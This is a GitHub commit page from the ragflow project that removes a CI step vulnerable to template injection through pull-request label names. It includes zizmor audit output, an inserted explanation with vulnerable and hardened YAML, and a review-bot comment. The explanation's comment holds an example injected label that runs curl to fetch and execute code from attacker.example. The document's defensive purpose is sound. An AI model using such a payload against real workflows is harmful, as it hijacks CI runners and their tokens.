ci: remove may expand into attacker-controllable code (#5407)

### What problem does this PR solve?

_Briefly describe what this PR aims to solve. Include background context
that will help reviewers understand the purpose of the PR._

This patch removes dangerous code that `may expand into
attacker-controllable code`

more:

```cli
error[template-injection]: code injection via template expansion
  --> /Users/hyi/prs/ragflow/.github/workflows/tests.yml:35:9
   |
35 |         - name: Show PR labels
   |           ^^^^^^^^^^^^^^^^^^^^ this step
36 |           run: |
   |  _________^
37 | |           echo "Workflow triggered by ${{ github.event_name }}"
38 | |           if [[ ${{ github.event_name }} == 'pull_request' ]]; then
39 | |             echo "PR labels: ${{ join(github.event.pull_request.labels.*.name, ', ') }}"
40 | |           fi
   | |____________^ github.event.pull_request.labels.*.name may expand into attacker-controllable code
   |
   = note: audit confidence → High

```

found by using zizmor to check:
https://woodruffw.github.io/zizmor/

but this patch does not fix them all, it just removes the findings with audit confidence →
High

### Type of change

- [ ] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [x] Other (please describe):

---------

Signed-off-by: yihong0618 <zouzou0208@gmail.com>
Co-authored-by: Zhichang Yu <yuzhichang@gmail.com>
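As an added illustration of the finding above (example workflow, not the ragflow project's own `tests.yml`), here is the vulnerable step pattern that the commit deletes, beside the hardened form GitHub's own security-hardening guidance recommends: route the expression through `env:` so the expanded value becomes a variable's contents rather than part of the script text. The job name, step names and the `PR_LABELS` / `EVENT_NAME` / `ACTOR` variable names are assumptions chosen for the example.

```yaml
# Added example, not code from the ragflow repository.
# Job and step names and the env variable names are assumptions.
jobs:
  show-context:
    runs-on: ubuntu-latest
    steps:
      # BEFORE (template injection, the pattern zizmor flagged):
      # ${{ ... }} is expanded by GitHub before bash ever sees the script,
      # so whoever controls a label name controls part of the shell script.
      # A label such as
      #   '; curl https://attacker.example/x | sh; echo '
      # is spliced in verbatim and runs with the job's GITHUB_TOKEN.
      - name: Show PR labels (vulnerable)
        if: github.event_name == 'pull_request'
        run: |
          echo "PR labels: ${{ join(github.event.pull_request.labels.*.name, ', ') }}"

      # AFTER (hardened): the same expressions are still evaluated, but only
      # into the values of environment variables. The run: script contains no
      # attacker-influenced bytes, and the variables are double-quoted so their
      # contents are printed, never re-parsed by the shell.
      - name: Show PR labels (hardened)
        if: github.event_name == 'pull_request'
        env:
          PR_LABELS: ${{ join(github.event.pull_request.labels.*.name, ', ') }}
          EVENT_NAME: ${{ github.event_name }}
          ACTOR: ${{ github.actor }}
        run: |
          echo "Workflow triggered by $EVENT_NAME (actor: $ACTOR)"
          echo "PR labels: $PR_LABELS"
```

The rule of thumb the hardened step follows: any `${{ }}` that appears inside `run:` (or inside `script:` for `actions/github-script`) is string-spliced into code, so every context that a non-maintainer can influence (PR titles, bodies, branch names, labels, commit messages, issue comments) must go through `env:` or a step `with:` input instead. Re-running `zizmor .github/workflows/tests.yml` after the change is the cheap regression check for this class of finding.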
yihong 2025-02-27 10:20:04 +08:00 committed by GitHub
parent fa76974e24
commit eaa1adb3b2
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194


@ -32,12 +32,9 @@ jobs:
# https://github.com/hmarr/debug-action # https://github.com/hmarr/debug-action
#- uses: hmarr/debug-action@v2 #- uses: hmarr/debug-action@v2
- name: Show PR labels - name: Show who triggered this workflow
run: | run: |
echo "Workflow triggered by ${{ github.event_name }}" echo "Workflow triggered by ${{ github.event_name }}"
if [[ ${{ github.event_name }} == 'pull_request' ]]; then
echo "PR labels: ${{ join(github.event.pull_request.labels.*.name, ', ') }}"
fi
- name: Ensure workspace ownership - name: Ensure workspace ownership
run: echo "chown -R $USER $GITHUB_WORKSPACE" && sudo chown -R $USER $GITHUB_WORKSPACE run: echo "chown -R $USER $GITHUB_WORKSPACE" && sudo chown -R $USER $GITHUB_WORKSPACE
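Review bot: the step is renamed to "Show who triggered this workflow", but its body is unchanged and only echoes `${{ github.event_name }}`, which is the event type, not who triggered it; either print the actor as well or keep the old name so the step name matches its output. Two smaller points on the same hunk: the remaining `${{ github.event_name }}` inside `run:` is GitHub-controlled rather than attacker-influenced, but moving it to `env:` (`env: EVENT_NAME: ${{ github.event_name }}` and `echo "Workflow triggered by $EVENT_NAME"`) leaves the script free of template expansion altogether, which is what the zizmor check is looking for; and if the label listing was still useful for debugging, it can be kept safely the same way, `PR_LABELS: ${{ join(github.event.pull_request.labels.*.name, ', ') }}` under `env:` and `echo "PR labels: $PR_LABELS"` in the script, instead of being dropped.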